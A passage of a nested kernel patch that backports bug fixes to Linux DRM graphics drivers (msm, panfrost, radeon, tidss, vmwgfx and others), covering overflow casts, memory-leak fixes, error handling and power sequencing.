+-static void dpu_hw_lm_setup_misr(struct dpu_hw_mixer *ctx, bool enable, u32 frame_count)
++static void dpu_hw_lm_setup_misr(struct dpu_hw_mixer *ctx)
+ {
+-	dpu_hw_setup_misr(&ctx->hw, LM_MISR_CTRL, enable, frame_count);
++	dpu_hw_setup_misr(&ctx->hw, LM_MISR_CTRL, 0x0);
+ }
+ 
+ static int dpu_hw_lm_collect_misr(struct dpu_hw_mixer *ctx, u32 *misr_value)
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.h
+index 652ddfdedec37..0a050eb247b99 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.h
+@@ -1,5 +1,6 @@
+ /* SPDX-License-Identifier: GPL-2.0-only */
+ /*
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2021, The Linux Foundation. All rights reserved.
+  */
+ 
+@@ -57,7 +58,7 @@ struct dpu_hw_lm_ops {
+ 	/**
+ 	 * setup_misr: Enable/disable MISR
+ 	 */
+-	void (*setup_misr)(struct dpu_hw_mixer *ctx, bool enable, u32 frame_count);
++	void (*setup_misr)(struct dpu_hw_mixer *ctx);
+ 
+ 	/**
+ 	 * collect_misr: Read MISR signature
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.c
+index 8062228eada68..1b7439ae686a7 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2018, The Linux Foundation. All rights reserved.
+  */
+ #define pr_fmt(fmt)	"[drm:%s:%d] " fmt, __func__, __LINE__
+@@ -450,9 +450,11 @@ u64 _dpu_hw_get_qos_lut(const struct dpu_qos_lut_tbl *tbl,
+ 	return 0;
+ }
+ 
++/*
++ * note: Aside from encoders, input_sel should be set to 0x0 by default
++ */
+ void dpu_hw_setup_misr(struct dpu_hw_blk_reg_map *c,
+-		u32 misr_ctrl_offset,
+-		bool enable, u32 frame_count)
++		u32 misr_ctrl_offset, u8 input_sel)
+ {
+ 	u32 config = 0;
+ 
+@@ -461,15 +463,9 @@ void dpu_hw_setup_misr(struct dpu_hw_blk_reg_map *c,
+ 	/* Clear old MISR value (in case it's read before a new value is calculated)*/
+ 	wmb();
+ 
+-	if (enable) {
+-		config = (frame_count & MISR_FRAME_COUNT_MASK) |
+-			MISR_CTRL_ENABLE | MISR_CTRL_FREE_RUN_MASK;
+-
+-		DPU_REG_WRITE(c, misr_ctrl_offset, config);
+-	} else {
+-		DPU_REG_WRITE(c, misr_ctrl_offset, 0);
+-	}
+-
++	config = MISR_FRAME_COUNT | MISR_CTRL_ENABLE | MISR_CTRL_FREE_RUN_MASK |
++		((input_sel & 0xF) << 24);
++	DPU_REG_WRITE(c, misr_ctrl_offset, config);
+ }
+ 
+ int dpu_hw_collect_misr(struct dpu_hw_blk_reg_map *c,
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.h
+index 27f4c39e35ab3..4ae2a434372cf 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.h
+@@ -1,6 +1,6 @@
+ /* SPDX-License-Identifier: GPL-2.0-only */
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2021, The Linux Foundation. All rights reserved.
+  */
+ 
+@@ -13,7 +13,7 @@
+ #include "dpu_hw_catalog.h"
+ 
+ #define REG_MASK(n)                     ((BIT(n)) - 1)
+-#define MISR_FRAME_COUNT_MASK           0xFF
++#define MISR_FRAME_COUNT                0x1
+ #define MISR_CTRL_ENABLE                BIT(8)
+ #define MISR_CTRL_STATUS                BIT(9)
+ #define MISR_CTRL_STATUS_CLEAR          BIT(10)
+@@ -350,9 +350,7 @@ u64 _dpu_hw_get_qos_lut(const struct dpu_qos_lut_tbl *tbl,
+ 		u32 total_fl);
+ 
+ void dpu_hw_setup_misr(struct dpu_hw_blk_reg_map *c,
+-		u32 misr_ctrl_offset,
+-		bool enable,
+-		u32 frame_count);
++		u32 misr_ctrl_offset, u8 input_sel);
+ 
+ int dpu_hw_collect_misr(struct dpu_hw_blk_reg_map *c,
+ 		u32 misr_ctrl_offset,
+diff --git a/drivers/gpu/drm/msm/disp/mdp4/mdp4_crtc.c b/drivers/gpu/drm/msm/disp/mdp4/mdp4_crtc.c
+index 169f9de4a12a7..3100957225a70 100644
+--- a/drivers/gpu/drm/msm/disp/mdp4/mdp4_crtc.c
++++ b/drivers/gpu/drm/msm/disp/mdp4/mdp4_crtc.c
+@@ -269,6 +269,7 @@ static void mdp4_crtc_atomic_disable(struct drm_crtc *crtc,
+ {
+ 	struct mdp4_crtc *mdp4_crtc = to_mdp4_crtc(crtc);
+ 	struct mdp4_kms *mdp4_kms = get_kms(crtc);
++	unsigned long flags;
+ 
+ 	DBG("%s", mdp4_crtc->name);
+ 
+@@ -281,6 +282,14 @@ static void mdp4_crtc_atomic_disable(struct drm_crtc *crtc,
+ 	mdp_irq_unregister(&mdp4_kms->base, &mdp4_crtc->err);
+ 	mdp4_disable(mdp4_kms);
+ 
++	if (crtc->state->event && !crtc->state->active) {
++		WARN_ON(mdp4_crtc->event);
++		spin_lock_irqsave(&mdp4_kms->dev->event_lock, flags);
++		drm_crtc_send_vblank_event(crtc, crtc->state->event);
++		crtc->state->event = NULL;
++		spin_unlock_irqrestore(&mdp4_kms->dev->event_lock, flags);
++	}
++
+ 	mdp4_crtc->enabled = false;
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c b/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
+index 7fc0975cb8693..62bc3756f2e2b 100644
+--- a/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
++++ b/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
+@@ -512,7 +512,9 @@ static int dsi_phy_enable_resource(struct msm_dsi_phy *phy)
+ 	struct device *dev = &phy->pdev->dev;
+ 	int ret;
+ 
+-	pm_runtime_get_sync(dev);
++	ret = pm_runtime_resume_and_get(dev);
++	if (ret)
++		return ret;
+ 
+ 	ret = clk_prepare_enable(phy->ahb_clk);
+ 	if (ret) {
+diff --git a/drivers/gpu/drm/nouveau/nv04_fence.c b/drivers/gpu/drm/nouveau/nv04_fence.c
+index 5b71a5a5cd85c..cdbc75e3d1f66 100644
+--- a/drivers/gpu/drm/nouveau/nv04_fence.c
++++ b/drivers/gpu/drm/nouveau/nv04_fence.c
+@@ -39,7 +39,7 @@ struct nv04_fence_priv {
+ static int
+ nv04_fence_emit(struct nouveau_fence *fence)
+ {
+-	struct nvif_push *push = fence->channel->chan.push;
++	struct nvif_push *push = unrcu_pointer(fence->channel)->chan.push;
+ 	int ret = PUSH_WAIT(push, 2);
+ 	if (ret == 0) {
+ 		PUSH_NVSQ(push, NV_SW, 0x0150, fence->base.seqno);
+diff --git a/drivers/gpu/drm/omapdrm/omap_drv.c b/drivers/gpu/drm/omapdrm/omap_drv.c
+index eaf67b9e5f12b..5b6d1668f405c 100644
+--- a/drivers/gpu/drm/omapdrm/omap_drv.c
++++ b/drivers/gpu/drm/omapdrm/omap_drv.c
+@@ -68,7 +68,6 @@ static void omap_atomic_commit_tail(struct drm_atomic_state *old_state)
+ {
+ 	struct drm_device *dev = old_state->dev;
+ 	struct omap_drm_private *priv = dev->dev_private;
+-	bool fence_cookie = dma_fence_begin_signalling();
+ 
+ 	dispc_runtime_get(priv->dispc);
+ 
+@@ -91,6 +90,8 @@ static void omap_atomic_commit_tail(struct drm_atomic_state *old_state)
+ 		omap_atomic_wait_for_completion(dev, old_state);
+ 
+ 		drm_atomic_helper_commit_planes(dev, old_state, 0);
++
++		drm_atomic_helper_commit_hw_done(old_state);
+ 	} else {
+ 		/*
+ 		 * OMAP3 DSS seems to have issues with the work-around above,
+@@ -100,11 +101,9 @@ static void omap_atomic_commit_tail(struct drm_atomic_state *old_state)
+ 		drm_atomic_helper_commit_planes(dev, old_state, 0);
+ 
+ 		drm_atomic_helper_commit_modeset_enables(dev, old_state);
+-	}
+ 
+-	drm_atomic_helper_commit_hw_done(old_state);
+-
+-	dma_fence_end_signalling(fence_cookie);
++		drm_atomic_helper_commit_hw_done(old_state);
++	}
+ 
+ 	/*
+ 	 * Wait for completion of the page flips to ensure that old buffers
+diff --git a/drivers/gpu/drm/panel/panel-elida-kd35t133.c b/drivers/gpu/drm/panel/panel-elida-kd35t133.c
+index eee714cf3f490..3a7fc3ca6a6fe 100644
+--- a/drivers/gpu/drm/panel/panel-elida-kd35t133.c
++++ b/drivers/gpu/drm/panel/panel-elida-kd35t133.c
+@@ -112,6 +112,8 @@ static int kd35t133_unprepare(struct drm_panel *panel)
+ 		return ret;
+ 	}
+ 
++	gpiod_set_value_cansleep(ctx->reset_gpio, 1);
++
+ 	regulator_disable(ctx->iovcc);
+ 	regulator_disable(ctx->vdd);
+ 
+diff --git a/drivers/gpu/drm/panel/panel-sitronix-st7701.c b/drivers/gpu/drm/panel/panel-sitronix-st7701.c
+index 225b9884f61a9..54b28992db5d8 100644
+--- a/drivers/gpu/drm/panel/panel-sitronix-st7701.c
++++ b/drivers/gpu/drm/panel/panel-sitronix-st7701.c
+@@ -288,7 +288,7 @@ static void st7701_init_sequence(struct st7701 *st7701)
+ 		   FIELD_PREP(DSI_CMD2_BK1_PWRCTRL2_AVDD_MASK,
+ 			      DIV_ROUND_CLOSEST(desc->avdd_mv - 6200, 200)) |
+ 		   FIELD_PREP(DSI_CMD2_BK1_PWRCTRL2_AVCL_MASK,
+-			      DIV_ROUND_CLOSEST(-4400 + desc->avcl_mv, 200)));
++			      DIV_ROUND_CLOSEST(-4400 - desc->avcl_mv, 200)));
+ 
+ 	/* T2D = 0.2us * T2D[3:0] */
+ 	ST7701_DSI(st7701, DSI_CMD2_BK1_SPD1,
+diff --git a/drivers/gpu/drm/panfrost/panfrost_gpu.c b/drivers/gpu/drm/panfrost/panfrost_gpu.c
+index 6452e4e900dd7..55d2430485168 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_gpu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_gpu.c
+@@ -71,7 +71,12 @@ int panfrost_gpu_soft_reset(struct panfrost_device *pfdev)
+ 	}
+ 
+ 	gpu_write(pfdev, GPU_INT_CLEAR, GPU_IRQ_MASK_ALL);
+-	gpu_write(pfdev, GPU_INT_MASK, GPU_IRQ_MASK_ALL);
++
++	/* Only enable the interrupts we care about */
++	gpu_write(pfdev, GPU_INT_MASK,
++		  GPU_IRQ_MASK_ERROR |
++		  GPU_IRQ_PERFCNT_SAMPLE_COMPLETED |
++		  GPU_IRQ_CLEAN_CACHES_COMPLETED);
+ 
+ 	return 0;
+ }
+@@ -313,28 +318,38 @@ static void panfrost_gpu_init_features(struct panfrost_device *pfdev)
+ 		 pfdev->features.shader_present, pfdev->features.l2_present);
+ }
+ 
++static u64 panfrost_get_core_mask(struct panfrost_device *pfdev)
++{
++	u64 core_mask;
++
++	if (pfdev->features.l2_present == 1)
++		return U64_MAX;
++
++	/*
++	 * Only support one core group now.
++	 * ~(l2_present - 1) unsets all bits in l2_present except
++	 * the bottom bit. (l2_present - 2) has all the bits in
++	 * the first core group set. AND them together to generate
++	 * a mask of cores in the first core group.
++	 */
++	core_mask = ~(pfdev->features.l2_present - 1) &
++		     (pfdev->features.l2_present - 2);
++	dev_info_once(pfdev->dev, "using only 1st core group (%lu cores from %lu)\n",
++		      hweight64(core_mask),
++		      hweight64(pfdev->features.shader_present));
++
++	return core_mask;
++}
++
+ void panfrost_gpu_power_on(struct panfrost_device *pfdev)
+ {
+ 	int ret;
+ 	u32 val;
+-	u64 core_mask = U64_MAX;
++	u64 core_mask;
+ 
+ 	panfrost_gpu_init_quirks(pfdev);
++	core_mask = panfrost_get_core_mask(pfdev);
+ 
+-	if (pfdev->features.l2_present != 1) {
+-		/*
+-		 * Only support one core group now.
+-		 * ~(l2_present - 1) unsets all bits in l2_present except
+-		 * the bottom bit. (l2_present - 2) has all the bits in
+-		 * the first core group set. AND them together to generate
+-		 * a mask of cores in the first core group.
+-		 */
+-		core_mask = ~(pfdev->features.l2_present - 1) &
+-			     (pfdev->features.l2_present - 2);
+-		dev_info_once(pfdev->dev, "using only 1st core group (%lu cores from %lu)\n",
+-			      hweight64(core_mask),
+-			      hweight64(pfdev->features.shader_present));
+-	}
+ 	gpu_write(pfdev, L2_PWRON_LO, pfdev->features.l2_present & core_mask);
+ 	ret = readl_relaxed_poll_timeout(pfdev->iomem + L2_READY_LO,
+ 		val, val == (pfdev->features.l2_present & core_mask),
+@@ -359,9 +374,26 @@ void panfrost_gpu_power_on(struct panfrost_device *pfdev)
+ 
+ void panfrost_gpu_power_off(struct panfrost_device *pfdev)
+ {
+-	gpu_write(pfdev, TILER_PWROFF_LO, 0);
+-	gpu_write(pfdev, SHADER_PWROFF_LO, 0);
+-	gpu_write(pfdev, L2_PWROFF_LO, 0);
++	int ret;
++	u32 val;
++
++	gpu_write(pfdev, SHADER_PWROFF_LO, pfdev->features.shader_present);
++	ret = readl_relaxed_poll_timeout(pfdev->iomem + SHADER_PWRTRANS_LO,
++					 val, !val, 1, 1000);
++	if (ret)
++		dev_err(pfdev->dev, "shader power transition timeout");
++
++	gpu_write(pfdev, TILER_PWROFF_LO, pfdev->features.tiler_present);
++	ret = readl_relaxed_poll_timeout(pfdev->iomem + TILER_PWRTRANS_LO,
++					 val, !val, 1, 1000);
++	if (ret)
++		dev_err(pfdev->dev, "tiler power transition timeout");
++
++	gpu_write(pfdev, L2_PWROFF_LO, pfdev->features.l2_present);
++	ret = readl_poll_timeout(pfdev->iomem + L2_PWRTRANS_LO,
++				 val, !val, 0, 1000);
++	if (ret)
++		dev_err(pfdev->dev, "l2 power transition timeout");
+ }
+ 
+ int panfrost_gpu_init(struct panfrost_device *pfdev)
+diff --git a/drivers/gpu/drm/radeon/r100.c b/drivers/gpu/drm/radeon/r100.c
+index d4f09ecc3d221..f336b5b3b11f4 100644
+--- a/drivers/gpu/drm/radeon/r100.c
++++ b/drivers/gpu/drm/radeon/r100.c
+@@ -2321,7 +2321,7 @@ int r100_cs_track_check(struct radeon_device *rdev, struct r100_cs_track *track)
+ 	switch (prim_walk) {
+ 	case 1:
+ 		for (i = 0; i < track->num_arrays; i++) {
+-			size = track->arrays[i].esize * track->max_indx * 4;
++			size = track->arrays[i].esize * track->max_indx * 4UL;
+ 			if (track->arrays[i].robj == NULL) {
+ 				DRM_ERROR("(PW %u) Vertex array %u no buffer "
+ 					  "bound\n", prim_walk, i);
+@@ -2340,7 +2340,7 @@ int r100_cs_track_check(struct radeon_device *rdev, struct r100_cs_track *track)
+ 		break;
+ 	case 2:
+ 		for (i = 0; i < track->num_arrays; i++) {
+-			size = track->arrays[i].esize * (nverts - 1) * 4;
++			size = track->arrays[i].esize * (nverts - 1) * 4UL;
+ 			if (track->arrays[i].robj == NULL) {
+ 				DRM_ERROR("(PW %u) Vertex array %u no buffer "
+ 					  "bound\n", prim_walk, i);
+diff --git a/drivers/gpu/drm/radeon/r600_cs.c b/drivers/gpu/drm/radeon/r600_cs.c
+index 638f861af80fa..6cf54a747749d 100644
+--- a/drivers/gpu/drm/radeon/r600_cs.c
++++ b/drivers/gpu/drm/radeon/r600_cs.c
+@@ -1275,7 +1275,7 @@ static int r600_cs_check_reg(struct radeon_cs_parser *p, u32 reg, u32 idx)
+ 			return -EINVAL;
+ 		}
+ 		tmp = (reg - CB_COLOR0_BASE) / 4;
+-		track->cb_color_bo_offset[tmp] = radeon_get_ib_value(p, idx) << 8;
++		track->cb_color_bo_offset[tmp] = (u64)radeon_get_ib_value(p, idx) << 8;
+ 		ib[idx] += (u32)((reloc->gpu_offset >> 8) & 0xffffffff);
+ 		track->cb_color_base_last[tmp] = ib[idx];
+ 		track->cb_color_bo[tmp] = reloc->robj;
+@@ -1302,7 +1302,7 @@ static int r600_cs_check_reg(struct radeon_cs_parser *p, u32 reg, u32 idx)
+ 					"0x%04X\n", reg);
+ 			return -EINVAL;
+ 		}
+-		track->htile_offset = radeon_get_ib_value(p, idx) << 8;
++		track->htile_offset = (u64)radeon_get_ib_value(p, idx) << 8;
+ 		ib[idx] += (u32)((reloc->gpu_offset >> 8) & 0xffffffff);
+ 		track->htile_bo = reloc->robj;
+ 		track->db_dirty = true;
+diff --git a/drivers/gpu/drm/radeon/radeon_display.c b/drivers/gpu/drm/radeon/radeon_display.c
+index ca5598ae8bfcf..1814bb8e14f10 100644
+--- a/drivers/gpu/drm/radeon/radeon_display.c
++++ b/drivers/gpu/drm/radeon/radeon_display.c
+@@ -687,11 +687,16 @@ static void radeon_crtc_init(struct drm_device *dev, int index)
+ 	if (radeon_crtc == NULL)
+ 		return;
+ 
++	radeon_crtc->flip_queue = alloc_workqueue("radeon-crtc", WQ_HIGHPRI, 0);
++	if (!radeon_crtc->flip_queue) {
++		kfree(radeon_crtc);
++		return;
++	}
++
+ 	drm_crtc_init(dev, &radeon_crtc->base, &radeon_crtc_funcs);
+ 
+ 	drm_mode_crtc_set_gamma_size(&radeon_crtc->base, 256);
+ 	radeon_crtc->crtc_id = index;
+-	radeon_crtc->flip_queue = alloc_workqueue("radeon-crtc", WQ_HIGHPRI, 0);
+ 	rdev->mode_info.crtcs[index] = radeon_crtc;
+ 
+ 	if (rdev->family >= CHIP_BONAIRE) {
+diff --git a/drivers/gpu/drm/radeon/radeon_vm.c b/drivers/gpu/drm/radeon/radeon_vm.c
+index 987cabbf1318e..c38b4d5d6a14f 100644
+--- a/drivers/gpu/drm/radeon/radeon_vm.c
++++ b/drivers/gpu/drm/radeon/radeon_vm.c
+@@ -1204,13 +1204,17 @@ int radeon_vm_init(struct radeon_device *rdev, struct radeon_vm *vm)
+ 	r = radeon_bo_create(rdev, pd_size, align, true,
+ 			     RADEON_GEM_DOMAIN_VRAM, 0, NULL,
+ 			     NULL, &vm->page_directory);
+-	if (r)
++	if (r) {
++		kfree(vm->page_tables);
++		vm->page_tables = NULL;
+ 		return r;
+-
++	}
+ 	r = radeon_vm_clear_bo(rdev, vm->page_directory);
+ 	if (r) {
+ 		radeon_bo_unref(&vm->page_directory);
+ 		vm->page_directory = NULL;
++		kfree(vm->page_tables);
++		vm->page_tables = NULL;
+ 		return r;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/radeon/si.c b/drivers/gpu/drm/radeon/si.c
+index a91012447b56e..85e9cba49cecb 100644
+--- a/drivers/gpu/drm/radeon/si.c
++++ b/drivers/gpu/drm/radeon/si.c
+@@ -3611,6 +3611,10 @@ static int si_cp_start(struct radeon_device *rdev)
+ 	for (i = RADEON_RING_TYPE_GFX_INDEX; i <= CAYMAN_RING_TYPE_CP2_INDEX; ++i) {
+ 		ring = &rdev->ring[i];
+ 		r = radeon_ring_lock(rdev, ring, 2);
++		if (r) {
++			DRM_ERROR("radeon: cp failed to lock ring (%d).\n", r);
++			return r;
++		}
+ 
+ 		/* clear the compute context state */
+ 		radeon_ring_write(ring, PACKET3_COMPUTE(PACKET3_CLEAR_STATE, 0));
+diff --git a/drivers/gpu/drm/radeon/sumo_dpm.c b/drivers/gpu/drm/radeon/sumo_dpm.c
+index f74f381af05fd..d49c145db4370 100644
+--- a/drivers/gpu/drm/radeon/sumo_dpm.c
++++ b/drivers/gpu/drm/radeon/sumo_dpm.c
+@@ -1493,8 +1493,10 @@ static int sumo_parse_power_table(struct radeon_device *rdev)
+ 		non_clock_array_index = power_state->v2.nonClockInfoIndex;
+ 		non_clock_info = (struct _ATOM_PPLIB_NONCLOCK_INFO *)
+ 			&non_clock_info_array->nonClockInfo[non_clock_array_index];
+-		if (!rdev->pm.power_state[i].clock_info)
++		if (!rdev->pm.power_state[i].clock_info) {
++			kfree(rdev->pm.dpm.ps);
+ 			return -EINVAL;
++		}
+ 		ps = kzalloc(sizeof(struct sumo_ps), GFP_KERNEL);
+ 		if (ps == NULL) {
+ 			kfree(rdev->pm.dpm.ps);
+diff --git a/drivers/gpu/drm/radeon/trinity_dpm.c b/drivers/gpu/drm/radeon/trinity_dpm.c
+index 08ea1c864cb23..ef1cc7bad20a7 100644
+--- a/drivers/gpu/drm/radeon/trinity_dpm.c
++++ b/drivers/gpu/drm/radeon/trinity_dpm.c
+@@ -1726,8 +1726,10 @@ static int trinity_parse_power_table(struct radeon_device *rdev)
+ 		non_clock_array_index = power_state->v2.nonClockInfoIndex;
+ 		non_clock_info = (struct _ATOM_PPLIB_NONCLOCK_INFO *)
+ 			&non_clock_info_array->nonClockInfo[non_clock_array_index];
+-		if (!rdev->pm.power_state[i].clock_info)
++		if (!rdev->pm.power_state[i].clock_info) {
++			kfree(rdev->pm.dpm.ps);
+ 			return -EINVAL;
++		}
+ 		ps = kzalloc(sizeof(struct sumo_ps), GFP_KERNEL);
+ 		if (ps == NULL) {
+ 			kfree(rdev->pm.dpm.ps);
+diff --git a/drivers/gpu/drm/tidss/tidss_dispc.c b/drivers/gpu/drm/tidss/tidss_dispc.c
+index 16301bdfead12..95b75236fe5e8 100644
+--- a/drivers/gpu/drm/tidss/tidss_dispc.c
++++ b/drivers/gpu/drm/tidss/tidss_dispc.c
+@@ -2653,18 +2653,69 @@ static void dispc_init_errata(struct dispc_device *dispc)
+ 	}
+ }
+ 
+-static void dispc_softreset(struct dispc_device *dispc)
++static int dispc_softreset(struct dispc_device *dispc)
+ {
+ 	u32 val;
+ 	int ret = 0;
+ 
++	/* K2G display controller does not support soft reset */
++	if (dispc->feat->subrev == DISPC_K2G)
++		return 0;
++
+ 	/* Soft reset */
+ 	REG_FLD_MOD(dispc, DSS_SYSCONFIG, 1, 1, 1);
+ 	/* Wait for reset to complete */
+ 	ret = readl_poll_timeout(dispc->base_common + DSS_SYSSTATUS,
+ 				 val, val & 1, 100, 5000);
++	if (ret) {
++		dev_err(dispc->dev, "failed to reset dispc\n");
++		return ret;
++	}
++
++	return 0;
++}
++
++static int dispc_init_hw(struct dispc_device *dispc)
++{
++	struct device *dev = dispc->dev;
++	int ret;
++
++	ret = pm_runtime_set_active(dev);
++	if (ret) {
++		dev_err(dev, "Failed to set DSS PM to active\n");
++		return ret;
++	}
++
++	ret = clk_prepare_enable(dispc->fclk);
++	if (ret) {
++		dev_err(dev, "Failed to enable DSS fclk\n");
++		goto err_runtime_suspend;
++	}
++
++	ret = dispc_softreset(dispc);
+ 	if (ret)
+-		dev_warn(dispc->dev, "failed to reset dispc\n");
++		goto err_clk_disable;
++
++	clk_disable_unprepare(dispc->fclk);
++	ret = pm_runtime_set_suspended(dev);
++	if (ret) {
++		dev_err(dev, "Failed to set DSS PM to suspended\n");
++		return ret;
++	}
++
++	return 0;
++
++err_clk_disable:
++	clk_disable_unprepare(dispc->fclk);
++
++err_runtime_suspend:
++	ret = pm_runtime_set_suspended(dev);
++	if (ret) {
++		dev_err(dev, "Failed to set DSS PM to suspended\n");
++		return ret;
++	}
++
++	return ret;
+ }
+ 
+ int dispc_init(struct tidss_device *tidss)
+@@ -2726,10 +2777,6 @@ int dispc_init(struct tidss_device *tidss)
+ 			return r;
+ 	}
+ 
+-	/* K2G display controller does not support soft reset */
+-	if (feat->subrev != DISPC_K2G)
+-		dispc_softreset(dispc);
+-
+ 	for (i = 0; i < dispc->feat->num_vps; i++) {
+ 		u32 gamma_size = dispc->feat->vp_feat.color.gamma_size;
+ 		u32 *gamma_table;
+@@ -2778,6 +2825,10 @@ int dispc_init(struct tidss_device *tidss)
+ 	of_property_read_u32(dispc->dev->of_node, "max-memory-bandwidth",
+ 			     &dispc->memory_bandwidth_limit);
+ 
++	r = dispc_init_hw(dispc);
++	if (r)
++		return r;
++
+ 	tidss->dispc = dispc;
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/tidss/tidss_kms.c b/drivers/gpu/drm/tidss/tidss_kms.c
+index afb2879980c6c..995bac488392a 100644
+--- a/drivers/gpu/drm/tidss/tidss_kms.c
++++ b/drivers/gpu/drm/tidss/tidss_kms.c
+@@ -4,8 +4,6 @@
+  * Author: Tomi Valkeinen <tomi.valkeinen@ti.com>
+  */
+ 
+-#include <linux/dma-fence.h>
+-
+ #include <drm/drm_atomic.h>
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_bridge.h>
+@@ -27,7 +25,6 @@ static void tidss_atomic_commit_tail(struct drm_atomic_state *old_state)
+ {
+ 	struct drm_device *ddev = old_state->dev;
+ 	struct tidss_device *tidss = to_tidss(ddev);
+-	bool fence_cookie = dma_fence_begin_signalling();
+ 
+ 	dev_dbg(ddev->dev, "%s\n", __func__);
+ 
+@@ -38,7 +35,6 @@ static void tidss_atomic_commit_tail(struct drm_atomic_state *old_state)
+ 	drm_atomic_helper_commit_modeset_enables(ddev, old_state);
+ 
+ 	drm_atomic_helper_commit_hw_done(old_state);
+-	dma_fence_end_signalling(fence_cookie);
+ 	drm_atomic_helper_wait_for_flip_done(ddev, old_state);
+ 
+ 	drm_atomic_helper_cleanup_planes(ddev, old_state);
+diff --git a/drivers/gpu/drm/tilcdc/tilcdc_drv.c b/drivers/gpu/drm/tilcdc/tilcdc_drv.c
+index f72755b8ea14c..86d34b77b37db 100644
+--- a/drivers/gpu/drm/tilcdc/tilcdc_drv.c
++++ b/drivers/gpu/drm/tilcdc/tilcdc_drv.c
+@@ -138,7 +138,7 @@ static int tilcdc_irq_install(struct drm_device *dev, unsigned int irq)
+ 	if (ret)
+ 		return ret;
+ 
+-	priv->irq_enabled = false;
++	priv->irq_enabled = true;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+index ae01d22b8f840..c46f380d91499 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+@@ -595,10 +595,9 @@ static int vmw_user_bo_synccpu_release(struct drm_file *filp,
+ 		if (!(flags & drm_vmw_synccpu_allow_cs)) {
+ 			atomic_dec(&vmw_bo->cpu_writers);
+ 		}
+-		ttm_bo_put(&vmw_bo->base);
++		vmw_user_bo_unref(&vmw_bo);
+ 	}
+ 
+-	drm_gem_object_put(&vmw_bo->base.base);
+ 	return ret;
+ }
+ 
+@@ -638,8 +637,7 @@ int vmw_user_bo_synccpu_ioctl(struct drm_device *dev, void *data,
+ 			return ret;
+ 
+ 		ret = vmw_user_bo_synccpu_grab(vbo, arg->flags);
+-		vmw_bo_unreference(&vbo);
+-		drm_gem_object_put(&vbo->base.base);
++		vmw_user_bo_unref(&vbo);
+ 		if (unlikely(ret != 0)) {
+ 			if (ret == -ERESTARTSYS || ret == -EBUSY)
+ 				return -EBUSY;
+@@ -713,7 +711,6 @@ int vmw_user_bo_lookup(struct drm_file *filp,
+ 	}
+ 
+ 	*out = gem_to_vmw_bo(gobj);
+-	ttm_bo_get(&(*out)->base);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_cotable.c b/drivers/gpu/drm/vmwgfx/vmwgfx_cotable.c
+index 79b30dc9d8253..97e56a94eaf80 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_cotable.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_cotable.c
+@@ -407,8 +407,8 @@ static int vmw_cotable_resize(struct vmw_resource *res, size_t new_size)
+ 	 * for the new COTable. Initially pin the buffer object to make sure
+ 	 * we can use tryreserve without failure.
+ 	 */
+-	ret = vmw_bo_create(dev_priv, new_size, &vmw_mob_placement,
+-			    true, true, vmw_bo_bo_free, &buf);
++	ret = vmw_gem_object_create(dev_priv, new_size, &vmw_mob_placement,
++				    true, true, vmw_bo_bo_free, &buf);
+ 	if (ret) {
+ 		DRM_ERROR("Failed initializing new cotable MOB.\n");
+ 		return ret;
+@@ -475,7 +475,7 @@ static int vmw_cotable_resize(struct vmw_resource *res, size_t new_size)
+ 
+ 	vmw_resource_mob_attach(res);
+ 	/* Let go of the old mob. */
+-	vmw_bo_unreference(&old_buf);
++	vmw_user_bo_unref(&old_buf);
+ 	res->id = vcotbl->type;
+ 
+ 	ret = dma_resv_reserve_fences(bo->base.resv, 1);
+@@ -492,7 +492,7 @@ out_map_new:
+ out_wait:
+ 	ttm_bo_unpin(bo);
+ 	ttm_bo_unreserve(bo);
+-	vmw_bo_unreference(&buf);
++	vmw_user_bo_unref(&buf);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+index 8459fab9d9797..136f1cdcf8cdf 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+@@ -969,6 +969,11 @@ static inline void vmw_bo_prio_del(struct vmw_buffer_object *vbo, int prio)
+ /**
+  * GEM related functionality - vmwgfx_gem.c
+  */
